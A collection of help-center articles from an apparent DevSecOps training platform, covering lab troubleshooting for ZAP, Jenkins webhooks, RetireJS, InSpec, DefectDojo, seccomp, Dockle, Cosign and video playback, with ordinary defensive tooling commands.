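As a supplement to the AJAX-spider tips above, the same spider run can also be driven from ZAP's local REST API, which is handy for scripting lab exercises. This is a hedged sketch, not from the course material: it assumes ZAP is listening on localhost:8080, that `changeme` stands in for your API key, and that `http://target.example.com` stands in for your lab target.

```shell
# Drive ZAP's AJAX spider via its REST API (endpoints from the ZAP API:
# ajaxSpider/action/scan, ajaxSpider/view/status, ajaxSpider/view/numberOfResults).
ZAP="http://localhost:8080"
KEY="changeme"                      # placeholder API key
TARGET="http://target.example.com"  # placeholder lab target

# Kick off the AJAX spider against the target
curl -s "$ZAP/JSON/ajaxSpider/action/scan/?apikey=$KEY&url=$TARGET"

# Poll until the spider no longer reports "running"
while curl -s "$ZAP/JSON/ajaxSpider/view/status/?apikey=$KEY" | grep -q running; do
  sleep 5
done

# How many URLs did it find?
curl -s "$ZAP/JSON/ajaxSpider/view/numberOfResults/?apikey=$KEY"
```

If the result count is still 0, revisit the table above — browser mode, authentication handling, and manual interactions are the usual culprits.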

Last updated on Jan 07, 2026

Troubleshooting Common Lab Technical Issues in DevSecOps Courses

Troubleshooting Common Lab Technical Issues in DevSecOps Courses Whether you’re working on a hands‑on lab, configuring CI/CD pipelines, or pulling Docker images, technical hiccups can stall your progress. This guide consolidates the most frequently reported problems from learners and provides clear, step‑by‑step solutions so you can get back to building secure, automated pipelines quickly. Introduction DevSecOps training environments are designed to be as close to real‑world production as possible. However, the combination of cloud resources, container images, and external services (GitLab, Jenkins, VPNs, etc.) sometimes leads to connectivity or configuration issues. Below you’ll find practical troubleshooting methods for the five most common lab problems: 1. Jenkins not detecting new GitLab commits 2. Confusion around Docker image sources (hysnsec/django vs. building from source) 3. Inability to start a lab exercise 4. Inability to access a lab after it has started 5. General network connectivity problems Follow the structured steps in each section to diagnose and resolve the issue efficiently. 1. Jenkins Doesn’t Detect New Changes in a GitLab Repository Why It Happens Jenkins relies on webhooks from GitLab to trigger builds when code changes. If the webhook is missing, mis‑configured, or the repository lacks a valid Jenkinsfile, Jenkins will appear idle even though commits are being pushed. Step‑by‑Step Fix | Step | Action | |------|--------| | 1 | Verify the webhook – In GitLab, navigate to Settings → Webhooks for the project. Ensure a webhook exists and is enabled. | | 2 | Test the webhook – Use the “Test hook” button. Jenkins should log a “Received GitLab webhook” entry. If not, check firewall rules or reverse‑proxy configuration. | | 3 | Confirm the Jenkinsfile – The repository must contain a top‑level Jenkinsfile with valid Groovy syntax. 
Open the file locally or via GitLab UI and run it through a linter (e.g., jenkinsfile-runner or the Jenkins UI’s Pipeline Syntax validator). | | 4 | Check Jenkins job configuration – The job should be set to “GitLab project” as the source and the correct credentials must be selected. | | 5 | Review Jenkins logs – Look for errors like “SCM polling failed” or “Missing pipeline script” in Manage Jenkins → System Log. | | 6 | Re‑trigger manually – Click “Build Now” to confirm the pipeline runs. If it succeeds, the webhook is likely the missing piece. | Quick Example # Simulate a webhook payload locally (requires ngrok or similar) curl -X POST -H "Content-Type: application/json" \ -d @sample-payload.json \ http://<jenkins-host>/gitlab-webhook/ If Jenkins logs the payload, the webhook path is correct; otherwise, adjust the URL or network settings. 2. Docker Image Confusion: hysnsec/django vs. Building from django.nv Bottom Line - hysnsec/django is a pre‑built, publicly hosted Docker image that contains the same codebase as the django.nv repository. - Building the image yourself from django.nv yields an identical runtime environment, provided you use the same Dockerfile and tags. When to Use Which | Scenario | Recommended Approach | |----------|----------------------| | Fast start, no custom changes | Pull hysnsec/django from Docker Hub: docker pull hysnsec/django | | Need to modify source code or dependencies | Clone django.nv, edit the Dockerfile or requirements, then run docker build -t my-django . | | Testing version updates | Build locally to verify changes before pushing to a private registry. | Common Pitfall - Incorrect image name – Typing hysnsec/django as hysensec/django (note the extra “e”) will cause Docker to return “manifest not found”. Double‑check spelling and tag (e.g., hysnsec/django:latest). 3. “I Am Unable to Start the Lab” Quick Checklist 1. Click “Start Exercise” – The lab environment is provisioned only after you explicitly start it. 2. 
Browser Compatibility – Use the latest Chrome or Firefox. Clear cache or open an Incognito/Private window. 3. Pop‑up Blockers – Ensure the platform can open new tabs/windows; disable pop‑up blockers temporarily. If the Button Is Unresponsive - Refresh the page and try again. - Log out and back in to reset the session token. - Verify that your account has lab access (some courses require prerequisite completion). 4. “I Am Unable to Access the Lab” Verify Lab Status | Check | How to Verify | |-------|---------------| | Lab provisioning | Look for a “Lab is ready” banner or a status indicator in the dashboard. | | Network reachability | Open the lab URL in a new tab; you should see a login screen or the lab UI. | | Credential validity | Use the provided username/password or SSH key; ensure there are no extra spaces or line‑breaks. | Typical Causes & Fixes - Forgot to start the lab – Return to the course page and press Start Exercise. - Expired session – Log out, clear browser cookies, and log back in. - Resource limits – Some labs have a concurrency limit; wait a few minutes and try again. 5. General Network Issues A stable network is essential for cloud‑based labs. Follow this systematic approach to isolate the problem. Diagnostic Checklist 1. Internet Stability - Switch between Wi‑Fi and mobile data to rule out ISP throttling. 2. VPN Interference - Disable VPN, then re‑enable it after a minute; some VPNs block required ports (e.g., 443, 22). 3. Device Restrictions - Use a personal laptop without corporate security policies that might block Docker or SSH. 4. Browser Extensions - Disable ad‑blockers, privacy extensions, or script blockers that could prevent loading of the lab UI. 5. Incognito/Private Mode - Open the lab in an incognito window to bypass cached cookies or extensions. 
Example: Testing Connectivity # Ping the lab host (replace with actual hostname) ping lab.example.com # Test TLS handshake openssl s_client -connect lab.example.com:443 -servername lab.example.com If the ping fails or the TLS handshake times out, the issue is likely at the network level (VPN, firewall, ISP). Tips & Best Practices - Document every change – Keep a simple log of what you modified (webhook URL, Dockerfile edits, network settings). - Use version control – Store your Jenkinsfile and Dockerfiles in a dedicated branch; you can revert quickly if syntax errors appear. - Leverage platform support – Most training portals have a Help or Chat button; provide screenshots and error logs for faster assistance. - Stay up to date – Periodically pull the latest hysnsec/django image to benefit from security patches (docker pull hysnsec/django). Conclusion Technical roadblocks are a normal part of any DevSecOps learning journey. By systematically checking webhooks, Docker image names, lab start procedures, and network configurations, you can resolve the majority of issues without waiting for external support. Keep this guide handy, and you’ll spend more time mastering secure pipelines and less time troubleshooting. Happy learning!
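The connectivity checks above can be wrapped in a small reusable helper. The sketch below is our own illustration (the host name is a placeholder, and it assumes `bash` and the `timeout` utility are available); it probes the two ports cloud labs typically need — 443 (HTTPS) and 22 (SSH):

```shell
# Probe a TCP port using bash's /dev/tcp; print a hint when blocked.
check_port() {
  host=$1; port=$2
  if timeout 3 bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null; then
    echo "$host:$port reachable"
  else
    echo "$host:$port BLOCKED (check VPN/firewall/proxy)"
  fi
}

check_port lab.example.com 443
check_port lab.example.com 22
```

Run it once on your normal network and once with the VPN disabled; differing results point straight at the VPN or corporate firewall.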

Last updated on Jan 06, 2026

RetireJS Installation and RetireIgnore Configuration for DevSecOps Pipelines

RetireJS Installation and RetireIgnore Configuration for DevSecOps Pipelines Learn how to install RetireJS with Docker or npm, decide when to run it in a container, and create an effective retireignore.json file for clean, repeatable scans in GitLab CI/CD. Introduction RetireJS is a popular open‑source scanner that detects vulnerable JavaScript libraries and Node modules. In DevSecOps courses you’ll often see it used in two different ways: 1. Docker image – a self‑contained environment that can be pulled and run instantly. 2. npm package – installed directly into the build agent’s runtime. Both approaches are valid, but each has trade‑offs in speed, reproducibility, and learning value. This article walks you through the best practices for installing RetireJS, explains why you may or may not need a dedicated container in your pipeline, and shows how to build a retireignore.json file that prevents false‑positive alerts from cluttering your reports. 1. Installing RetireJS – Docker vs. npm When to use Docker | ✅ Benefits | ⚠️ Considerations | |------------|-------------------| | Zero‑dependency – the image bundles Node, RetireJS, and all required libraries. | Slightly larger download size the first time you pull the image. | | Consistent environment – the same version runs on every runner, eliminating “works on my machine” issues. | Requires a Docker runtime on the GitLab runner. | | Fast spin‑up – container starts in seconds; ideal for CI jobs that run many times a day. | May add a small overhead compared to a locally installed binary. | Typical Docker command docker run --rm -v $(pwd):/src retirejs/retirejs \ --outputformat json --outputpath /src/retire-report.json The -v $(pwd):/src flag mounts the repository into the container, allowing RetireJS to scan the codebase. When to use npm | ✅ Benefits | ⚠️ Considerations | |------------|-------------------| | Hands‑on learning – installing via npm shows how the tool integrates with a Node environment. 
| Requires Node.js and npm to be present on the runner. | | Fine‑grained control – you can lock the exact version in package.json. | Potential version drift if the runner’s global npm modules differ. | | Simpler for local debugging – run npx retire directly from the terminal. | Slightly longer setup time on a fresh runner. |

npm installation steps

```shell
# 1️⃣ Add RetireJS as a dev dependency
npm install --save-dev retire

# 2️⃣ Run the scan (example for a GitLab job)
npx retire --outputformat json --outputpath retire-report.json
```

Tip: If the lab exercise explicitly asks you to use npm, follow that path. It reinforces the concept of tool installation and version management, which is valuable for real‑world DevSecOps work.

2. Running RetireJS in a CI/CD Pipeline – Do You Need a Container? Both Docker and npm achieve the same scanning outcome; the choice hinges on speed vs. flexibility. Preferred approach for CI/CD - Use the Docker image when you want the fastest, most reproducible scan. The container eliminates the need to install Node or RetireJS on the runner, reducing job duration. - Use npm when you already have a Node environment set up (e.g., a pipeline that runs other npm scripts) and you want to keep the dependency list in package.json.

Example GitLab CI job (Docker)

```yaml
retirejs_scan:
  stage: test
  image: docker:latest
  services:
    - docker:dind
  script:
    - docker pull retirejs/retirejs
    - docker run --rm -v $CI_PROJECT_DIR:/src retirejs/retirejs --outputformat json --outputpath /src/retire-report.json
  artifacts:
    paths:
      - retire-report.json
```

Example GitLab CI job (npm)

```yaml
retirejs_scan:
  stage: test
  image: node:18
  before_script:
    - npm ci  # installs all dev dependencies, including retire
  script:
    - npx retire --outputformat json --outputpath retire-report.json
  artifacts:
    paths:
      - retire-report.json
```

Both snippets produce a retire-report.json artifact that can be consumed by downstream security dashboards. 3. 
Building a retireignore.json File A retireignore.json file tells RetireJS to skip known false positives or components that you have deliberately accepted. Here’s how to decide what belongs in it. Step‑by‑step process 1. Run an initial scan and collect the JSON report. 2. Identify false positives – look for entries where: - The library version is flagged, but you have verified it is patched or not vulnerable in your context. - The vulnerability is a known issue with RetireJS’s detection logic (e.g., a forked library with a different name). 3. Confirm with stakeholders – discuss the findings with developers, security analysts, or product owners to ensure consensus. 4. Add the component to retireignore.json using the following schema: { "ignore": [ { "path": "public/js/vendor/jquery.min.js", "component": "jquery", "version": "3.5.1", "reason": "Patched in-house; CVE‑2020‑11022 not applicable" }, { "path": "node_modules/some-lib", "component": "some-lib", "version": "*", "reason": "Library is a development‑only tool" } ] } 5. Re‑run the scan to verify the entries are correctly ignored. Practical example During a scan you notice lodash 4.17.15 is reported as vulnerable, but the project uses a custom build that removes the vulnerable functions. After confirming with the team, you add: { "ignore": [ { "component": "lodash", "version": "4.17.15", "reason": "Custom build excludes vulnerable functions" } ] } Now future scans will no longer flag this entry, keeping the report focused on real risks. 4. Tips & Common Questions Frequently asked questions | Question | Answer | |----------|--------| | Do I need both Docker and npm installations? | No. Choose one based on your pipeline’s needs. Using both would duplicate effort and increase build time. | | Can I store retireignore.json in version control? | Absolutely. Keeping it in the repo ensures every runner uses the same ignore rules and provides auditability. | | What if a new vulnerability appears in an ignored component? 
| Update the ignore entry with a new reason or remove it entirely, then re‑scan. Ignoring should be a temporary mitigation, not a permanent blanket. | | Is the Docker image always up‑to‑date? | Pull the latest tag (retirejs/retirejs:latest) at the start of each job, or pin to a specific version for reproducibility (retirejs/retirejs:3.0.0). | Quick checklist before committing - [ ] Decide Docker or npm installation (avoid both). - [ ] Verify the runner has the required runtime (Docker daemon or Node). - [ ] Run a scan and review the JSON report. - [ ] Discuss any flagged items with the development team. - [ ] Add confirmed false positives to retireignore.json. - [ ] Commit the ignore file and update CI configuration if needed. Conclusion RetireJS is a versatile tool for detecting vulnerable JavaScript dependencies. By selecting the appropriate installation method—Docker for speed and consistency, npm for hands‑on learning—you can integrate it smoothly into GitLab CI/CD pipelines. Properly maintaining a retireignore.json file ensures your security reports stay actionable and free from noise. Follow the steps and tips outlined above to embed RetireJS confidently in any DevSecOps workflow.
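The checklist above can be partly automated in a pre-commit or CI step. This is our own sketch, assuming the npm installation path from earlier and that `python3` is available for JSON validation; the `--ignorefile` flag is how retire is pointed at an ignore file, but verify it against `npx retire --help` on your installed version:

```shell
# Sanity-check the ignore file's JSON, then run retire against it.
# File names follow the article; adjust to your repo layout.
python3 -m json.tool retireignore.json > /dev/null \
  && echo "retireignore.json is valid JSON" \
  || echo "retireignore.json is missing or malformed"

# Run the scan with the ignore rules applied (requires retire installed via npm)
npx retire --ignorefile retireignore.json \
  --outputformat json --outputpath retire-report.json \
  || echo "retire scan did not run (is it installed as a dev dependency?)"
```

Validating the JSON first avoids the silent-failure mode where a misplaced comma causes every "ignored" finding to reappear in the report.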

Last updated on Jan 06, 2026

Understanding Security Scanning Tools: SCA, InSpec, SSH, and DefectDojo

Understanding Security Scanning Tools: SCA, InSpec, SSH, and DefectDojo Security scanning is a core pillar of any DevSecOps pipeline. Whether you are tracking vulnerable libraries, validating compliance controls, or consolidating findings, the right tools make the difference between a noisy pipeline and a trustworthy release. This article demystifies four commonly‑used components—Software Component Analysis (SCA) tools, InSpec, SSH, and DefectDojo—and shows how they fit together in a practical lab environment. 1. Software Component Analysis (SCA) – Choose the Tool That Fits Your Goal 1.1 What is SCA? SCA examines the open‑source packages that make up your application (e.g., npm, pip, Maven) and maps them to known vulnerability databases. The output is a list of vulnerable components, license conflicts, and suggested upgrades. 1.2 You Can Use Any SCA Tool The exam or lab typically states “implement an SCA tool.” It does not lock you into a specific product. | Popular SCA tools | Typical use‑case | Key features | |-------------------|------------------|--------------| | Retire.js | JavaScript front‑end libraries | Quick CLI, built‑in vulnerability DB | | Safety | Python packages (pip) | CVE‑based reporting, integrates with GitHub Actions | | OWASP Dependency‑Check | Java, .NET, Ruby, Python | Supports multiple ecosystems, Maven/Gradle plugins | | Snyk | Multi‑language, CI/CD integration | Real‑time monitoring, auto‑fix PRs | Bottom line: As long as the tool performs a full SCA scan and you can export the results (JSON, CSV, etc.), you will receive full credit. Pick the one you are most comfortable with, configure it correctly, and document the output. 2. InSpec – Auditing Infrastructure via SSH 2.1 How InSpec Works InSpec is an open‑source compliance‑as‑code framework. It runs profiles (collections of controls) against a target system and returns pass/fail results. 1. Package the profile in a Docker image or install InSpec on your workstation. 2. 
Provide the target address (IP or hostname). 3. Authenticate using an SSH private key. 4. InSpec opens an SSH session, executes the required commands, and streams the results back. 2.2 Containerized vs. Native Execution Running InSpec inside a container is equivalent to a native installation: - The container includes the InSpec binary and any required gems. - When you launch the container, you mount your SSH key (or specify its path) and pass the target host. - InSpec uses the key at ~/.ssh/id_rsa by default. If your key lives elsewhere, add -i /path/to/key to the command line. Example command (Docker):

```shell
docker run --rm -v $HOME/.ssh:/root/.ssh \
  -e TARGET=10.0.2.15 \
  my-inspec-image \
  inspec exec my-profile -t ssh://root@${TARGET} -i /root/.ssh/custom_key
```

2.3 Why SSH Is Required InSpec does not need a special agent on the target host. It leverages the ubiquitous SSH protocol to: - Run commands with the privileges of the supplied user. - Avoid opening additional ports or installing agents. Therefore, any machine that accepts SSH connections (Linux, macOS, Windows with OpenSSH) can be scanned. 3. DefectDojo – Centralizing Findings from Multiple Scanners 3.1 What Is DefectDojo? DefectDojo is an open‑source vulnerability management platform built with Django (a Python web framework). It aggregates, normalizes, and tracks findings from many security scanners. 3.2 “OS and App Support” Explained - Django‑based: The fact that DefectDojo is written in Django only means the application itself runs on a Python/Django stack. It does not restrict the types of applications you can assess. - Parser ecosystem: DefectDojo ships with dozens of parsers (JSON, XML, CSV) for tools such as Retire.js, Safety, Trivy, Nessus, and many more. When you upload a scan report, the appropriate parser translates the raw data into a unified format that DefectDojo can display and track. 3.3 Typical Workflow 1. Run an SCA scan (e.g., Safety) → export JSON. 2. 
Run an InSpec compliance scan → export JUnit XML. 3. Upload both files to DefectDojo via the UI or API. 4. DefectDojo normalizes the findings, tags them by severity, and lets you assign remediation owners. 5. Generate reports for auditors, management, or CI pipelines. 4. Practical Lab Scenario Goal: Scan a Python web app for vulnerable dependencies, validate SSH‑based hardening controls, and store all results in DefectDojo. 1. SCA with Safety safety check --full-report -r requirements.txt -o safety-report.json 2. InSpec compliance profile (stored in ssh-hardening-profile) inspec exec ssh-hardening-profile -t ssh://ubuntu@10.0.1.20 -i ~/.ssh/lab_key 3. Upload to DefectDojo (using the REST API) curl -X POST "https://dojo.example.com/api/v2/import-scan/" \ -H "Authorization: Token <API_TOKEN>" \ -F "file=@safety-report.json" -F "scan_type=Safety" \ -F "engagement=42" -F "product=7" Repeat for the InSpec XML output. The lab is complete when DefectDojo shows both sets of findings, each linked to the same engagement. 5. Common Questions | Question | Answer | |----------|--------| | Can I mix different SCA tools in one engagement? | Yes. Upload each report separately; DefectDojo will treat them as distinct scans but you can view them together. | | Do I need a separate SSH key for InSpec and Ansible? | No. Any key that grants the required privileges on the target host works for both tools. | | What if my private key is not in ~/.ssh? | Use the -i /path/to/key flag (or mount the key into the container) to tell InSpec where to find it. | | Is DefectDojo limited to Django projects? | No. It can store findings from any language, framework, or platform as long as the scanner’s output is supported. | | How do I know which parser to use in DefectDojo? | The UI lists supported scan types (e.g., “Safety”, “InSpec”). Choose the matching type when importing. | 6. 
Tips for Success - Standardize output formats: Export scans as JSON or XML; these are the most reliably parsed by DefectDojo. - Version‑lock your tools: Record the exact tool versions (e.g., Safety 2.3.1) to ensure reproducible results. - Secure your SSH keys: Use passphrase‑protected keys and a dedicated, low‑privilege user for scanning. - Automate uploads: Incorporate the DefectDojo API into your CI pipeline to keep findings up‑to‑date without manual steps. - Leverage built‑in profiles: InSpec ships with many ready‑made compliance profiles (CIS, PCI‑DSS). Start with those to avoid writing controls from scratch. By understanding the flexibility of SCA tools, the SSH‑driven nature of InSpec, and the centralizing power of DefectDojo, you can build a robust, language‑agnostic security testing workflow that satisfies both exam requirements and real‑world DevSecOps best practices. Happy scanning!
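The "automate uploads" tip above can be sketched as a tiny wrapper around the same import-scan endpoint shown in the lab scenario. This is our own illustration: the host, token, engagement ID, file names, and scan-type labels are placeholders — match the scan types to the list in your DefectDojo UI:

```shell
# Upload several scanner reports to DefectDojo's import-scan API in one loop.
DOJO="https://dojo.example.com"  # placeholder host
TOKEN="REPLACE_ME"              # placeholder API token
ENGAGEMENT=42                   # placeholder engagement ID

upload_scan() {
  file=$1; scan_type=$2
  # -sf: fail quietly on HTTP errors so the fallback message fires
  curl -sf -X POST "$DOJO/api/v2/import-scan/" \
    -H "Authorization: Token $TOKEN" \
    -F "file=@$file" -F "scan_type=$scan_type" \
    -F "engagement=$ENGAGEMENT" \
    || echo "upload of $file failed"
}

upload_scan safety-report.json "Safety"
upload_scan retire-report.json "Retire.js Scan"
```

Dropping this at the end of a CI job keeps DefectDojo current without any manual uploads.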

Last updated on Jan 06, 2026

Lab Troubleshooting Guide: Seccomp Profiles, Dockerfile Security (Dockle), and Cosign Image Signing

In DevSecOps labs you'll often encounter three recurring challenges: limiting system calls with a seccomp profile, identifying security gaps in a Dockerfile using Dockle, and verifying container signatures with Cosign. This guide walks you through each problem, explains why you might see unexpected behavior, and provides step-by-step fixes you can apply right away.

1. Seccomp Profile Not Blocking Expected System Calls

1.1 What the lab asks you to do

The challenge requires you to create a seccomp JSON profile that blocks specific syscalls (e.g., mkdir, chown, chmod). When the profile is applied, attempts to run those calls inside the container should fail with "Operation not permitted."

1.2 Why chown and chmod appear to succeed

| Scenario | Command executed | Expected result | Actual result | Why it happens |
|----------|------------------|-----------------|---------------|----------------|
| Block mkdir only | adduser abc (creates home dir) | mkdir /home/abc fails → user creation aborts | Fails as expected | The blocked mkdir syscall stops the creation of the home directory. |
| Block chown only | adduser abc (creates home dir, then chown) | chown 1000:1000 /home/abc fails → user creation aborts | Fails as expected | The chown syscall is denied, so ownership cannot be set. |
| Block chmod only | adduser abc (creates home dir, then chmod) | chmod on /home/abc fails → user creation aborts | Fails as expected | The chmod syscall is denied, preventing permission changes. |
| No syscalls blocked | adduser abc | All steps succeed | Success | No restrictions are in place. |

If you see no error when running chown or chmod, it usually means those syscalls are not actually blocked in your profile. Common reasons:

1. Incorrect JSON syntax – a misplaced comma or wrong field name causes the rule to be ignored.
2. Wrong architecture field – seccomp profiles are architecture-specific ("arch": "SCMP_ARCH_X86_64"). Using the wrong value makes the rule ineffective.
3. Profile not applied – the container must be started with --security-opt seccomp=./myprofile.json. Forgetting this flag leaves the default profile in place.

1.3 How to verify your profile

1. Inspect the running container:

```
docker inspect <container-id> | grep -i seccomp
```

The SecurityOpt entry in the output should reference the JSON file you supplied.

2. Test each syscall directly:

```
docker run --rm --security-opt seccomp=./myprofile.json \
  alpine:latest sh -c "mkdir /tmp/test && echo ok"
```

Replace mkdir with chown or chmod to confirm they are blocked.

3. Use strace for debugging (optional):

```
docker run --rm --security-opt seccomp=./myprofile.json \
  -v /usr/bin/strace:/usr/bin/strace \
  alpine:latest strace -e trace=%file -f sh -c "adduser abc"
```

Look for EPERM (Operation not permitted) on the blocked syscall.

1.4 Quick checklist for a working seccomp profile

- ✅ JSON is valid (run jq . myprofile.json to confirm).
- ✅ Architecture matches the host (SCMP_ARCH_X86_64 for most Linux hosts).
- ✅ Each rule includes "action": "SCMP_ACT_ERRNO" (or SCMP_ACT_KILL) and the correct "names": ["mkdir"], etc.
- ✅ Container started with --security-opt seccomp=./myprofile.json.

2. Analyzing a Dockerfile with Dockle (Without Hints)

2.1 What Dockle does

Dockle is a static analysis tool that scans a built Docker image for best-practice security issues: unnecessary packages, insecure permissions, use of the root user, missing HEALTHCHECK, etc.

2.2 Step-by-step manual inspection

1. Clone the repository:

```
git clone https://github.com/goodwithtech/dockle-ci-test.git
cd dockle-ci-test
```

2. Open the Dockerfile and look for red flags:

```dockerfile
FROM python:3.9-slim

# ✅ apt caches are cleaned up after install
RUN apt-get update && apt-get install -y \
    curl \
    git \
    && rm -rf /var/lib/apt/lists/*

# ⚠️ Running as root
USER root
WORKDIR /app
COPY . /app
RUN pip install --no-cache-dir -r requirements.txt
EXPOSE 8000
CMD ["python", "manage.py", "runserver", "0.0.0.0:8000"]
```

Potential issues:
- Root user: Switch to a non-privileged user (USER appuser).
- Missing HEALTHCHECK: Add a health endpoint to detect crashes.
- Unpinned packages: Pin versions in requirements.txt to avoid supply-chain attacks.
- Excessive permissions: Ensure copied files have least-privilege permissions (chmod 644 for code, chmod 600 for secrets).

3. Apply best-practice fixes:

```dockerfile
FROM python:3.9-slim

RUN apt-get update && apt-get install -y --no-install-recommends \
    curl \
    git \
    && rm -rf /var/lib/apt/lists/*

# Create a non-root user
RUN groupadd -r app && useradd -r -g app appuser

WORKDIR /app
COPY --chown=appuser:app . /app
RUN pip install --no-cache-dir -r requirements.txt
EXPOSE 8000

HEALTHCHECK --interval=30s --timeout=5s \
    CMD curl -f http://localhost:8000/health || exit 1

USER appuser
CMD ["python", "manage.py", "runserver", "0.0.0.0:8000"]
```

4. Run Dockle locally (optional) to confirm the fixes:

```
docker build -t mysecureimage .
dockle mysecureimage
```

2.3 Key takeaways

- Never run containers as root unless absolutely necessary.
- Pin third-party dependencies and keep the base image up-to-date.
- Add a HEALTHCHECK to let orchestrators detect unhealthy containers.
- Set file ownership and permissions at build time (--chown, chmod).

3. Cosign Verification Failing – "No Matching Signatures"

3.1 What the error means

```
Error: no matching signatures: signature not found in transparency log
```

Cosign looks for a signature attached to the image and, optionally, a record in the Rekor transparency log. If neither exists, verification stops with the message above.

3.2 Common causes

| Cause | Symptoms | Fix |
|-------|----------|-----|
| Image was not signed, or was signed with a different key | cosign verify returns "no matching signatures". | Re-run cosign sign --key <private-key> <image> and confirm the command succeeds. |
| Wrong image reference (registry, tag, or digest) | Verification points to an image that has no signature. | Use the exact reference shown after signing (e.g., harbor-wlye1f2u.lab.practical-devsecops.training/library/django.nv@sha256:…). |
| Transparency log disabled or network blocked | Cosign cannot write/read Rekor entries. | Ensure outbound HTTPS to rekor.sigstore.dev (or your private Rekor) is allowed, or pass --insecure-ignore-tlog for a local-only check. |
| Public key mismatch | Cosign finds a signature but cannot verify it. | Verify you are using the same public key (cosign.pub) that matches the private key used to sign. |

3.3 Step-by-step resolution

1. Confirm you have a private key (cosign.key) and its public counterpart (cosign.pub).
2. Sign the image (replace placeholders with your actual registry and tag):

```
cosign sign --key cosign.key \
  harbor-wlye1f2u.lab.practical-devsecops.training/library/django.nv:1.0
```

Expected outcome: a signature pushed to the registry alongside the image, plus a Rekor entry.

3. Verify the signature using the public key:

```
cosign verify --key cosign.pub \
  harbor-wlye1f2u.lab.practical-devsecops.training/library/django.nv:1.0
```

You should see something like: Verification succeeded for <image>@sha256:...

4. If verification still fails, list the signatures attached to the image:

```
cosign tree harbor-wlye1f2u.lab.practical-devsecops.training/library/django.nv:1.0
```

Cosign stores signatures as a separate OCI artifact tagged sha256-<digest>.sig next to the image. If no signatures are listed, the sign step didn't complete.

5. Check Rekor (optional):

```
cosign verify --rekor-url https://rekor.sigstore.dev \
  --key cosign.pub \
  harbor-wlye1f2u.lab.practical-devsecops.training/library/django.nv:1.0
```

3.4 Quick troubleshooting checklist

- ✅ Signed the exact same image reference you are verifying.
- ✅ Public key (cosign.pub) matches the private key used for signing.
- ✅ Network access to the Rekor server (or use --insecure-ignore-tlog).
- ✅ Image registry supports OCI artifacts such as Cosign signatures (most modern registries do).

Common Questions & Tips

| Question | Answer |
|----------|--------|
| Do I need to rebuild the image after adding a seccomp profile? | No. The profile is attached at container-run time via --security-opt. Rebuilding isn't required. |
| Can Dockle be run against a Dockerfile directly? | Dockle works on built images. Use docker build -t test . && dockle test, or a CI step that builds then scans. |
| Is it safe to skip transparency-log verification with Cosign? | Only for local testing. In production you should verify signatures and, optionally, the Rekor log. |
| Why does chmod sometimes work even when blocked? | The C library often calls a variant such as fchmodat or fchmod instead of chmod, so blocking chmod alone isn't enough. Block the whole family (chmod, fchmod, fchmodat), and likewise chown, fchown, fchownat, lchown. |
| How can I tell whether seccomp filtering is active in a container? | Run grep Seccomp /proc/1/status inside the container – "Seccomp: 2" means a filter is applied, "Seccomp: 0" means unconfined. |

Bottom Line

- Seccomp: Validate JSON syntax, architecture, and container launch flags; test each syscall individually.
- Dockerfile security: Look for root usage, missing health checks, unpinned dependencies, and improper permissions; fix them before scanning with Dockle.
- Cosign: Ensure the image is signed with the correct key, use the exact image reference, and confirm Rekor connectivity.

Follow this guide, and you'll troubleshoot the most common lab roadblocks with confidence. Happy securing!
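The profile checklist above can be automated with a short script. The sketch below is not the lab's official profile — it is a minimal example that generates a seccomp profile denying mkdir, chown, and chmod, including the `*at`/`f*` variants that libc often calls instead of the plain syscalls, and then re-parses the file to catch the "invalid JSON" failure mode:

```python
import json

# Syscalls to deny. The fchmodat/fchownat variants are included because
# libc frequently calls them instead of chmod()/chown() directly.
BLOCKED = [
    "mkdir", "mkdirat",
    "chown", "fchown", "fchownat", "lchown",
    "chmod", "fchmod", "fchmodat",
]

def make_profile(blocked):
    """Build a seccomp profile: allow everything except `blocked`."""
    return {
        "defaultAction": "SCMP_ACT_ALLOW",
        "architectures": ["SCMP_ARCH_X86_64"],
        "syscalls": [
            # One rule covering all denied syscalls; ERRNO makes them
            # fail with "Operation not permitted" instead of killing
            # the process.
            {"names": list(blocked), "action": "SCMP_ACT_ERRNO"}
        ],
    }

# Write the profile, then re-parse it to confirm the JSON is valid.
with open("myprofile.json", "w") as f:
    json.dump(make_profile(BLOCKED), f, indent=2)

with open("myprofile.json") as f:
    loaded = json.load(f)

assert loaded["syscalls"][0]["action"] == "SCMP_ACT_ERRNO"
print("profile OK:", len(loaded["syscalls"][0]["names"]), "syscalls blocked")
```

You would then launch the container with `docker run --rm --security-opt seccomp=./myprofile.json alpine sh -c "mkdir /tmp/x"` and expect "Operation not permitted".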

Last updated on Jan 06, 2026

Resolving Video Playback and Performance Issues in DevSecOps Labs

Whether you're watching instructional videos or running hands-on exercises, a smooth lab experience is essential for mastering DevSecOps concepts. Learners often encounter two common problems: videos that won't play, and slow or unresponsive lab environments (GitLab, Dojo, Production, Docker, etc.). This guide consolidates proven troubleshooting steps, practical examples, and quick tips so you can get back to learning without delay.

Table of Contents
1. Why Videos Might Fail to Load
2. Step-by-Step Fixes for Video Playback
3. Understanding Lab Performance Slowdowns
4. Troubleshooting Slow or Unresponsive Labs
5. Quick Tips & Frequently Asked Questions
6. When to Contact Support

Why Videos Might Fail to Load

Video content is streamed from our cloud servers, so any obstacle between your device and the internet can block playback. Typical culprits include:

- Corporate firewalls or proxy filters that block streaming ports.
- Unstable or low-bandwidth networks (e.g., public Wi-Fi, congested VPN).
- Internet Service Provider (ISP) throttling of video traffic.
- Device restrictions on company-issued laptops (security policies, disabled browsers).

Understanding the root cause helps you apply the most effective remedy.

Step-by-Step Fixes for Video Playback

1. Use a Personal or Unrestricted Device
- Why: Company laptops often have strict outbound rules that can block video streams.
- How: Switch to a personal computer, tablet, or a personal-use virtual machine that isn't subject to corporate policies.

2. Verify Network Quality

| Action | What to Check | Recommended Value |
|--------|---------------|-------------------|
| Speed Test | Run a test on speedtest.net | ≥ 5 Mbps download for SD, ≥ 15 Mbps for HD |
| Latency | Ping a reliable host (e.g., 8.8.8.8) | ≤ 100 ms |
| Packet Loss | Observe loss percentage | < 1 % |

If the results fall short, move to a more reliable Wi-Fi network, wired Ethernet, or a different location.

3. Bypass ISP or Corporate Restrictions
- Alternative network: Connect via a mobile hotspot or another Wi-Fi network.
- VPN solution: Use a reputable VPN service to encrypt traffic and route it through a region without video throttling.
- Tip: Choose a server geographically close to the lab's data center for lower latency.

4. Browser & System Checks
- Clear cache and cookies.
- Ensure the browser is up-to-date (Chrome, Edge, or Firefox are recommended).
- Disable any ad-blocking extensions that might interfere with video players.

5. Test the Video Directly
- Open the video URL in an incognito/private window.
